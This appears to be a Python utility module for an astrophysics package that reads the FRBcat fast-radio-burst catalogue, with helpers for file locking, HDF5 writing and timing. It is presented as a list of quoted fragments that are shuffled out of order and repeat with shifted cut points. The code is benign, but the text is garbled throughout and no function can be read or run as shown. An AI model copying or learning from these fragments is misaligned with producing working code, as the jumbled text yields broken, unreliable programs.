"with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that tells whether the",
"`iterable` that satisfies the `condition`. If the condition is not given, returns the",
"tele in telescopes] ) : continue if tau and ( row[i_tau] == 'null'",
"to remove the lock file, but don't try too hard because it is",
"**kwargs ): \"\"\" wrapper to print the time needed to call function f",
"'Write2h5 needs list of datas and keys' ) ### small workaround to allow",
"0 while tries < 30: #try: with h5.File( filename, 'a' ) as f:",
") break #except: sleep(3e-2) tries += 1 pass else: print( \"couldn't write \",",
")[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header ==",
"no item satysfing the condition is found. >>> first( (1,2,3), condition=lambda x: x",
"('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False",
"np, yt, csv from time import time, sleep from PreFRBLE.file_system import * from",
"is released, then with is performed ''' def first(iterable, condition = lambda x:",
"is not None and time() > (start_lock_search + self._timeout): # Exceeded the user-specified",
"your h5 file. in that case, visit: ### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while",
"float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs",
"header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s =",
"self._fd = os.open(self._path, os.O_CREAT) start_lock_search = time() while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX |",
"FRB_dtype for row in reader: if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele]",
"'a' ) as f: for data, key in zip( datas, keys ): try:",
"listed in FRBcat \"\"\" ### read all FRBs from FRBcat ### optional: read",
"print( \"timeout exceeded\" ) raise # TODO It would be nice to avoid",
"): \"\"\" conveniently write datas to keys in filename. overwrite existing entries \"\"\"",
"np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM = np.where( header ==",
"(start_lock_search + self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise",
"#except: sleep(3e-2) tries += 1 pass else: print( \"couldn't write \", keys )",
"pass else: print( \"couldn't write \", keys ) sys.exit(1) ## Read FRBcat #FRB_dtype",
"tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ]",
"to keys in filename. overwrite existing entries \"\"\" if type(keys) is str: sys.exit(",
"RM : boolean if True, only return FRBs observed with RM tau :",
"s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime() from time import sleep",
"overwrite existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs list of",
")[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header ==",
"== 'RM': return FRBs['RM'] ## flocker to keep parallel processes from writing to",
"extracted FRBs FRBs = [] with open( frbcat_file, 'r') as f: reader =",
"keys' ) ### small workaround to allow for parallel computation. Use with caution,",
"elif self._timeout is not None and time() > (start_lock_search + self._timeout): # Exceeded",
"to write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\" conveniently",
"# Try to remove the lock file, but don't try too hard because",
"the iterable. Returns -1 if no item satysfing the condition is found. >>>",
"print_number=False ): \"\"\" read all FRBs in FRBcat, downloaded to frbcat_file Parameters ----------",
"## perform action on the locked file(s) ## file is locked when with",
"fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as ex:",
"key, data=data ) break #except: sleep(3e-2) tries += 1 pass else: print( \"couldn't",
"remove the lock file, but don't try too hard because it is #",
"for some function ''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper",
"FRBcat \"\"\" if 'f' in dtype: if 'null' in string: return float('NaN') return",
"): \"\"\" read all FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes",
"It would be nice to avoid an arbitrary sleep here, but spinning #",
"== 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where(",
"self._timeout is not None and time() > (start_lock_search + self._timeout): # Exceeded the",
"derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface",
"as f: for data, key in zip( datas, keys ): try: f[key][()] f.__delitem__(",
"whether the lock is active ## perform action on the locked file(s) ##",
"30: #try: with h5.File( filename, 'a' ) as f: for data, key in",
"code is paused until lock is released, then with is performed ''' def",
"returns measures of FRBs in FRBcat read with GetFRBcat() \"\"\" if measure ==",
"list list of considered telescopes, FRBs of other telescopes are ignored RM :",
"if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] )",
"tries = 0 while tries < 30: #try: with h5.File( filename, 'a' )",
"os.close(self._fd) self._fd = None # Try to remove the lock file, but don't",
"if file is locked, code is paused until lock is released, then with",
"%s took %i minutes and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional",
"### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632 tries = 0 while tries < 30: #try: with h5.File( filename,",
"= time() - t0 print( \"Running %s took %i minutes and %.1f seconds",
": boolean if True, only return FRBs observed with temproal broadening print_number :",
"until lock is released, then with is performed ''' def first(iterable, condition =",
"continue if RM and ( row[i_RM] == 'null' ) : continue FRBs.append( tuple(",
"IOError) as ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise elif",
"took {} s\".format( func.__name__, time()-t0 ) ) return res return MeasureTime() from time",
"header = np.array(reader.next()) i_ID = 0 i_DM = np.where( header == 'rmp_dm' )[0][0]",
"i_zs, i_tele] ## order must fit order of FRB_dtype for row in reader:",
"syntax. It will create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path, timeout",
"with RM and tau ### print_number:True print number of extracted FRBs FRBs =",
"https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest possible interface to",
"simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides",
"-1 if no item satysfing the condition is found. >>> first( (1,2,3), condition=lambda",
"from FRBcat \"\"\" if 'f' in dtype: if 'null' in string: return float('NaN')",
") : continue if RM and ( row[i_RM] == 'null' ) : continue",
"func.__name__, time()-t0 ) ) return res return MeasureTime() from time import sleep ##",
"boolean if True, only return FRBs observed with RM tau : boolean if",
"in filename. overwrite existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5 needs",
"return FRBs['RM'] ## flocker to keep parallel processes from writing to same file",
"released, then with is performed ''' def first(iterable, condition = lambda x: True):",
"of other telescopes are ignored RM : boolean if True, only return FRBs",
"extractet FRBs Returns ------- FRBs : array structured numpy.array containing values listed in",
"t0 print( \"Running %s took %i minutes and %.1f seconds %s\" % (f.__name__,",
"also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None #",
") ) return res return MeasureTime() from time import sleep ## wrapper to",
"import * from PreFRBLE.parameter import * from time import time def TimeElapsed( func,",
"None and time() > (start_lock_search + self._timeout): # Exceeded the user-specified timeout. print(",
">>> first( (1,2,3), condition=lambda x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition",
"and %.1f seconds %s\" % (f.__name__, t//60, t%60, print_additional ) ) return ret",
"to show time needed for some function ''' def HowLong( f, *args, print_additional='',",
"avoid an arbitrary sleep here, but spinning # without a delay is also",
"condition(x)) except: return -1 ## wrapper to show time needed for some function",
"from time import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import *",
"while True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError,",
": list list of considered telescopes, FRBs of other telescopes are ignored RM",
"== 0) 2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x",
"sleep ## wrapper to write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[]",
"fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as ex: if ex.errno !=",
"for parallel computation. Use with caution, might corrupt nodes in your h5 file.",
"from __future__ import print_function import sys, h5py as h5, numpy as np, yt,",
"in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue if tau and (",
"exists by examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\",",
"returns the first item of the iterable. Returns -1 if no item satysfing",
"2 >>> first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x > 9)",
"PreFRBLE.file_system import * from PreFRBLE.parameter import * from time import time def TimeElapsed(",
"print_number:True print number of extracted FRBs FRBs = [] with open( frbcat_file, 'r')",
"return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short wrapper",
"downloaded to frbcat_file Parameters ---------- telescopes : list list of considered telescopes, FRBs",
"user see whether a lock # exists by examining the filesystem. try: os.unlink(self._path)",
"return FRBs observed with temproal broadening print_number : boolean if True, print number",
"that satisfies the `condition`. If the condition is not given, returns the first",
"def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove",
"function ''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print",
"'rmp_rm' )[0][0] i_tau = np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header",
"read all FRBs from FRBcat ### optional: read only those FRBs observed by",
"except (OSError, IOError) as ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable",
"satysfing the condition is found. >>> first( (1,2,3), condition=lambda x: x % 2",
"but spinning # without a delay is also undesirable. sleep(0.1) def __exit__(self, *args):",
"from time import time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time",
"with h5.File( filename, 'a' ) as f: for data, key in zip( datas,",
"csv.reader( f ) header = np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0",
"= np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0]",
"def __init__(self, path, timeout = None): self._path = path self._timeout = timeout self._fd",
"raise elif self._timeout is not None and time() > (start_lock_search + self._timeout): #",
"the `iterable` that satisfies the `condition`. If the condition is not given, returns",
"file, but don't try too hard because it is # unnecessary. This is",
"condition=lambda x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return",
"measures of FRBs in FRBcat read with GetFRBcat() \"\"\" if measure == 'DM':",
"except: return -1 ## wrapper to show time needed for some function '''",
"needed for some function ''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\"",
"byte-strings read from FRBcat \"\"\" if 'f' in dtype: if 'null' in string:",
"h5py as h5, numpy as np, yt, csv from time import time, sleep",
"some function ''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to",
"order must fit order of FRB_dtype for row in reader: if telescopes and",
"key ) except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries +=",
") header = np.array(next(reader)) # header = np.array(reader.next()) i_ID = 0 i_DM =",
"np.where( header == 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele",
"res = func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 )",
"FRBs observed with RM tau : boolean if True, only return FRBs observed",
"# TODO It would be nice to avoid an arbitrary sleep here, but",
"= 0 while tries < 30: #try: with h5.File( filename, 'a' ) as",
"all FRBs from FRBcat ### optional: read only those FRBs observed by telescope",
"of datas and keys' ) ### small workaround to allow for parallel computation.",
"with temproal broadening print_number : boolean if True, print number of extractet FRBs",
"observed by telescope with RM and tau ### print_number:True print number of extracted",
"the lock file, but don't try too hard because it is # unnecessary.",
"wrapper to show time needed for some function ''' def HowLong( f, *args,",
"f \"\"\" t0 = time() ret = f( *args, **kwargs ) t =",
"tries < 30: #try: with h5.File( filename, 'a' ) as f: for data,",
"optional: read only those FRBs observed by telescope with RM and tau ###",
") def decode( string, dtype='U' ): \"\"\" short wrapper to decode byte-strings read",
"examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ##",
"of extractet FRBs Returns ------- FRBs : array structured numpy.array containing values listed",
"is performed ''' def first(iterable, condition = lambda x: True): \"\"\" Returns the",
"= [] with open( frbcat_file, 'r') as f: reader = csv.reader( f )",
"telescopes : list list of considered telescopes, FRBs of other telescopes are ignored",
"): \"\"\" measure time taken to compute function \"\"\" def MeasureTime(): t0 =",
"MeasureTime(): t0 = time() res = func( *args, **kwargs) print( \"{} took {}",
"fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError) as ex: if",
"containing values listed in FRBcat \"\"\" ### read all FRBs from FRBcat ###",
"wrapper to print the time needed to call function f \"\"\" t0 =",
"time() ret = f( *args, **kwargs ) t = time() - t0 print(",
"TODO It would be nice to avoid an arbitrary sleep here, but spinning",
"FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\" short wrapper to decode",
"path, timeout = None): self._path = path self._timeout = timeout self._fd = None",
"def decode( string, dtype='U' ): \"\"\" short wrapper to decode byte-strings read from",
"): \"\"\" wrapper to print the time needed to call function f \"\"\"",
"pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries += 1 pass else:",
"[('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None,",
"temproal broadening print_number : boolean if True, print number of extractet FRBs Returns",
"time() res = func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0",
"100)) 3 >>> first( (1,2,3), condition=lambda x: x > 9) -1 THANKS TO",
"#try: with h5.File( filename, 'a' ) as f: for data, key in zip(",
"from PreFRBLE.parameter import * from time import time def TimeElapsed( func, *args, **kwargs",
"sleep here, but spinning # without a delay is also undesirable. sleep(0.1) def",
"------- FRBs : array structured numpy.array containing values listed in FRBcat \"\"\" ###",
"*args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 ) ) return res",
"time import sleep ## wrapper to write hdf5 files consistently def Write2h5( filename='',",
"RM tau : boolean if True, only return FRBs observed with temproal broadening",
"def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in FRBcat,",
"key in zip( datas, keys ): try: f[key][()] f.__delitem__( key ) except: pass",
"FRBs=None ): \"\"\" returns measures of FRBs in FRBcat read with GetFRBcat() \"\"\"",
"to decode byte-strings read from FRBcat \"\"\" if 'f' in dtype: if 'null'",
"to avoid an arbitrary sleep here, but spinning # without a delay is",
"print the time needed to call function f \"\"\" t0 = time() ret",
"telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) :",
"try: return next(x for x in iterable if condition(x)) except: return -1 ##",
"__exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove the",
"the filesystem. try: os.unlink(self._path) except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\"",
"# unnecessary. This is mostly to help the user see whether a lock",
"time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import * from time import",
"with RM tau : boolean if True, only return FRBs observed with temproal",
"with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM':",
"] ) ) return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ):",
"that tells whether the lock is active ## perform action on the locked",
"timeout = None): self._path = path self._timeout = timeout self._fd = None def",
"Use with caution, might corrupt nodes in your h5 file. in that case,",
"def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken to compute function",
") as f: for data, key in zip( datas, keys ): try: f[key][()]",
"of FRB_dtype for row in reader: if telescopes and ( row[i_tele] not in",
"(1,2,3), condition=lambda x: x % 2 == 0) 2 >>> first(range(3, 100)) 3",
": boolean if True, only return FRBs observed with RM tau : boolean",
"keys in filename. overwrite existing entries \"\"\" if type(keys) is str: sys.exit( 'Write2h5",
"is str: sys.exit( 'Write2h5 needs list of datas and keys' ) ### small",
"write datas to keys in filename. overwrite existing entries \"\"\" if type(keys) is",
"until its left ## if file is locked, code is paused until lock",
"\"\"\" conveniently write datas to keys in filename. overwrite existing entries \"\"\" if",
"## flocker to keep parallel processes from writing to same file simultaneously ##",
"[('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all",
"by telescope with RM and tau ### print_number:True print number of extracted FRBs",
"measure time taken to compute function \"\"\" def MeasureTime(): t0 = time() res",
"number of extracted FRBs FRBs = [] with open( frbcat_file, 'r') as f:",
"header == 'rmp_scattering' )[0][0] i_zs = np.where( header == 'rmp_redshift_host' )[0][0] i_tele =",
"\"\"\" def MeasureTime(): t0 = time() res = func( *args, **kwargs) print( \"{}",
"= np.where( header == 'telescope' )[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau,",
"lock file, but don't try too hard because it is # unnecessary. This",
"res return MeasureTime() from time import sleep ## wrapper to write hdf5 files",
"for data, key in zip( datas, keys ): try: f[key][()] f.__delitem__( key )",
"= np.where( header == 'rmp_dm' )[0][0] i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0]",
"\"\"\" read all FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes :",
"create/truncate/delete the lock file as necessary.\"\"\" def __init__(self, path, timeout = None): self._path",
"condition = lambda x: True): \"\"\" Returns the first item in the `iterable`",
"HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print the time needed",
"t = time() - t0 print( \"Running %s took %i minutes and %.1f",
"= path self._timeout = timeout self._fd = None def __enter__(self): self._fd = os.open(self._path,",
"first(range(3, 100)) 3 >>> first( (1,2,3), condition=lambda x: x > 9) -1 THANKS",
"\"\"\" try: return next(x for x in iterable if condition(x)) except: return -1",
"f: reader = csv.reader( f ) header = np.array(next(reader)) # header = np.array(reader.next())",
"# Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise # TODO It",
"np.where( header == 'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau",
"provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock: \"\"\"Provides the simplest",
"lock # exists by examining the filesystem. try: os.unlink(self._path) except: pass ''' USAGE",
"errno.EAGAIN: # Resource temporarily unavailable raise elif self._timeout is not None and time()",
"f: for data, key in zip( datas, keys ): try: f[key][()] f.__delitem__( key",
"of considered telescopes, FRBs of other telescopes are ignored RM : boolean if",
"time import time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken",
"): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data ) break",
"'r') as f: reader = csv.reader( f ) header = np.array(next(reader)) # header",
"True: try: fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB) # Lock acquired! return except (OSError, IOError)",
"func( *args, **kwargs) print( \"{} took {} s\".format( func.__name__, time()-t0 ) ) return",
"*args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try to remove the lock",
"simplest possible interface to flock-based file locking. Intended for use with the `with`",
"in string: return float('NaN') return float(string) return string def GetFRBsMeasures( measure='DM', FRBs=None ):",
"is a temporary file that tells whether the lock is active ## perform",
"zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) ) return np.array( FRBs, dtype=FRB_dtype ) def",
"to print the time needed to call function f \"\"\" t0 = time()",
"mostly to help the user see whether a lock # exists by examining",
"tells whether the lock is active ## perform action on the locked file(s)",
"only those FRBs observed by telescope with RM and tau ### print_number:True print",
"read from FRBcat \"\"\" if 'f' in dtype: if 'null' in string: return",
"''' def first(iterable, condition = lambda x: True): \"\"\" Returns the first item",
"'rop_mw_dm_limit' )[0][0] i_RM = np.where( header == 'rmp_rm' )[0][0] i_tau = np.where( header",
"to flock-based file locking. Intended for use with the `with` syntax. It will",
"ignored RM : boolean if True, only return FRBs observed with RM tau",
"and keys' ) ### small workaround to allow for parallel computation. Use with",
"path self._timeout = timeout self._fd = None def __enter__(self): self._fd = os.open(self._path, os.O_CREAT)",
"('tele','U10')] FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ):",
"only return FRBs observed with RM tau : boolean if True, only return",
"spinning # without a delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd,",
"keys ): try: f[key][()] f.__delitem__( key ) except: pass f.create_dataset( key, data=data )",
"type(keys) is str: sys.exit( 'Write2h5 needs list of datas and keys' ) ###",
"the first item of the iterable. Returns -1 if no item satysfing the",
"FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list list of",
"row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) : continue if tau",
"(1,2,3), condition=lambda x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try:",
"''' def HowLong( f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print the",
"a lock # exists by examining the filesystem. try: os.unlink(self._path) except: pass '''",
": continue if tau and ( row[i_tau] == 'null' ) : continue if",
"''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file that tells",
") ) return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U' ): \"\"\"",
"keys ) sys.exit(1) ## Read FRBcat #FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')] #FRB_dtype =",
"import * from time import time def TimeElapsed( func, *args, **kwargs ): \"\"\"",
"of extracted FRBs FRBs = [] with open( frbcat_file, 'r') as f: reader",
"def GetFRBsMeasures( measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in FRBcat read",
"the `condition`. If the condition is not given, returns the first item of",
"import time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken to",
"9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for x in",
"the condition is found. >>> first( (1,2,3), condition=lambda x: x % 2 ==",
"np.where( header == 'rmp_redshift_host' )[0][0] i_tele = np.where( header == 'telescope' )[0][0] i_s",
"t0 = time() ret = f( *args, **kwargs ) t = time() -",
"measure='DM', FRBs=None ): \"\"\" returns measures of FRBs in FRBcat read with GetFRBcat()",
"to help the user see whether a lock # exists by examining the",
"print_additional='', **kwargs ): \"\"\" wrapper to print the time needed to call function",
"active ## perform action on the locked file(s) ## file is locked when",
"only return FRBs observed with temproal broadening print_number : boolean if True, print",
") except: pass f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries += 1",
"## wrapper to show time needed for some function ''' def HowLong( f,",
"str: sys.exit( 'Write2h5 needs list of datas and keys' ) ### small workaround",
"a delay is also undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd",
"\"\"\"Provides the simplest possible interface to flock-based file locking. Intended for use with",
"self._timeout): # Exceeded the user-specified timeout. print( \"timeout exceeded\" ) raise # TODO",
"x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x for",
"other telescopes are ignored RM : boolean if True, only return FRBs observed",
"import time, sleep from PreFRBLE.file_system import * from PreFRBLE.parameter import * from time",
"user-specified timeout. print( \"timeout exceeded\" ) raise # TODO It would be nice",
"# Resource temporarily unavailable raise elif self._timeout is not None and time() >",
") return res return MeasureTime() from time import sleep ## wrapper to write",
"i_tele] ## order must fit order of FRB_dtype for row in reader: if",
"datas and keys' ) ### small workaround to allow for parallel computation. Use",
"## order must fit order of FRB_dtype for row in reader: if telescopes",
"file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl, errno class SimpleFlock:",
"True, only return FRBs observed with RM tau : boolean if True, only",
"def MeasureTime(): t0 = time() res = func( *args, **kwargs) print( \"{} took",
"writing to same file simultaneously ## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14 import os, fcntl,",
"x: x > 9) -1 THANKS TO Caridorc https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition \"\"\" try: return next(x",
"measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker",
"filename='', datas=[], keys=[] ): \"\"\" conveniently write datas to keys in filename. overwrite",
") ] ) ) return np.array( FRBs, dtype=FRB_dtype ) def decode( string, dtype='U'",
"FRBs FRBs = [] with open( frbcat_file, 'r') as f: reader = csv.reader(",
"FRBcat read with GetFRBcat() \"\"\" if measure == 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure",
"wrapper to write hdf5 files consistently def Write2h5( filename='', datas=[], keys=[] ): \"\"\"",
"Returns the first item in the `iterable` that satisfies the `condition`. If the",
"datas=[], keys=[] ): \"\"\" conveniently write datas to keys in filename. overwrite existing",
"time taken to compute function \"\"\" def MeasureTime(): t0 = time() res =",
"row[i_RM] == 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i,",
"time def TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken to compute",
"MeasureTime() from time import sleep ## wrapper to write hdf5 files consistently def",
"f.create_dataset( key, data=data ) break #except: sleep(3e-2) tries += 1 pass else: print(",
"all FRBs in FRBcat, downloaded to frbcat_file Parameters ---------- telescopes : list list",
"list of datas and keys' ) ### small workaround to allow for parallel",
"first( (1,2,3), condition=lambda x: x % 2 == 0) 2 >>> first(range(3, 100))",
"print number of extractet FRBs Returns ------- FRBs : array structured numpy.array containing",
"to frbcat_file Parameters ---------- telescopes : list list of considered telescopes, FRBs of",
"locked file(s) ## file is locked when with starts until its left ##",
"to call function f \"\"\" t0 = time() ret = f( *args, **kwargs",
"*args, **kwargs ) t = time() - t0 print( \"Running %s took %i",
": array structured numpy.array containing values listed in FRBcat \"\"\" ### read all",
"undesirable. sleep(0.1) def __exit__(self, *args): fcntl.flock(self._fd, fcntl.LOCK_UN) os.close(self._fd) self._fd = None # Try",
"on the locked file(s) ## file is locked when with starts until its",
"import print_function import sys, h5py as h5, numpy as np, yt, csv from",
"iterable. Returns -1 if no item satysfing the condition is found. >>> first(",
"locked, code is paused until lock is released, then with is performed '''",
"( row[i_RM] == 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for",
"function f \"\"\" t0 = time() ret = f( *args, **kwargs ) t",
"from FRBcat ### optional: read only those FRBs observed by telescope with RM",
"== 'DM': return FRBs['DM']-FRBs['DM_gal'] elif measure == 'RM': return FRBs['RM'] ## flocker to",
"first(iterable, condition = lambda x: True): \"\"\" Returns the first item in the",
"'f' in dtype: if 'null' in string: return float('NaN') return float(string) return string",
"if True, print number of extractet FRBs Returns ------- FRBs : array structured",
") ### small workaround to allow for parallel computation. Use with caution, might",
"except: pass ''' USAGE with SimpleFlock(\"locktest\", 2): ## \"locktest\" is a temporary file",
"found. >>> first( (1,2,3), condition=lambda x: x % 2 == 0) 2 >>>",
"TimeElapsed( func, *args, **kwargs ): \"\"\" measure time taken to compute function \"\"\"",
"flock-based file locking. Intended for use with the `with` syntax. It will create/truncate/delete",
"condition=lambda x: x % 2 == 0) 2 >>> first(range(3, 100)) 3 >>>",
"reader = csv.reader( f ) header = np.array(next(reader)) # header = np.array(reader.next()) i_ID",
"**kwargs ): \"\"\" measure time taken to compute function \"\"\" def MeasureTime(): t0",
"datas to keys in filename. overwrite existing entries \"\"\" if type(keys) is str:",
"(OSError, IOError) as ex: if ex.errno != errno.EAGAIN: # Resource temporarily unavailable raise",
"i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype",
"decode( string, dtype='U' ): \"\"\" short wrapper to decode byte-strings read from FRBcat",
"with is performed ''' def first(iterable, condition = lambda x: True): \"\"\" Returns",
"FRBs observed by telescope with RM and tau ### print_number:True print number of",
"decode byte-strings read from FRBcat \"\"\" if 'f' in dtype: if 'null' in",
"locking. Intended for use with the `with` syntax. It will create/truncate/delete the lock",
"FRBs['RM'] ## flocker to keep parallel processes from writing to same file simultaneously",
"then with is performed ''' def first(iterable, condition = lambda x: True): \"\"\"",
"necessary.\"\"\" def __init__(self, path, timeout = None): self._path = path self._timeout = timeout",
"f, *args, print_additional='', **kwargs ): \"\"\" wrapper to print the time needed to",
"small workaround to allow for parallel computation. Use with caution, might corrupt nodes",
"the condition is not given, returns the first item of the iterable. Returns",
"and ( row[i_RM] == 'null' ) : continue FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype)",
")[0][0] i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must",
"continue if tau and ( row[i_tau] == 'null' ) : continue if RM",
"('tele','U10')] def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ): \"\"\" read all FRBs in",
